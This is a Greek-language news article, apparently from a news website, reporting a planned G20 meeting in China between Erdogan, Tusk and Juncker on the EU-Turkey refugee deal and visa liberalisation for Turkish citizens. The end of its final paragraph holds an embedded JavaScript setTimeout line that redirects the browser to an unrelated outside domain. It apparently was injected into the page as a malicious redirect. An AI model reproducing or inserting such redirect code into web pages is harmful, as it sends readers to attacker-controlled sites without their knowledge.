Επαφές Γιούνκερ, Τουσκ, Ερντογάν στην G20 για βίζα και προσφυγικό

0
4

 

Στο περιθώριο της Συνόδου της G20 στην Κίνα θα συναντηθούν ο Τούρκος πρωθυπουργός Ρετζέπ Ταγίπ Ερντογάν με τον πρόεδρο του Ευρωπαϊκού Συμβουλίου Ντόναλντ Τουσκ και τον πρόεδρο της Ευρωπαϊκής Επιτροπής, Ζαν Κλοντ Γιούνκερ. Στο επίκεντρο των συζητήσεών τους θα βρεθούν η συμφωνία ΕΕ-Τουρκίας στη διαχείριση του προσφυγικού αλλά και το θέμα της βίζας.

Αυτό ανέφεραν στο Αθηναϊκό -Μακεδονικό Πρακτορείο κοινοτικές πηγές, επισημαίνοντας ότι οι συζητήσεις μεταξύ ΕΕ και Άγκυρας συνεχίζονται, μετά τις πρόσφατες «εποικοδομητικές» επισκέψεις στην Άγκυρα του Επιτρόπου Μετανάστευσης, Δημήτρη Αβραμόπουλου, αλλά και του προέδρου του Ευρωπαϊκού Κοινοβουλίου, Μάρτιν Σιουλτς.

Οι ίδιες πηγές τονίζουν, άλλωστε, ότι και οι δύο πλευρές έχουν κοινό συμφέρον να αποτρέψουν την κατάρρευση της συμφωνίας της 18ης Μαρτίου και προσθέτουν ότι παρά τα όσα ακούγονται δεν υπάρχει κανένα σημείο ρήξης όσον αφορά την προοπτική μιας συμφωνίας για τη βίζα σε Τούρκους πολίτες.

Το βασικό αγκάθι που έχει απομείνει προς την εκπλήρωση των κριτηρίων, από την πλευρά της Άγκυρας, για την απελευθέρωση του καθεστώτος θεωρήσεων (βίζα) για τους Τούρκους πολίτες, είναι η αντιτρομοκρατική νομοθεσία στην Τουρκία, επισημαίνουν ευρωπαϊκές πηγές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here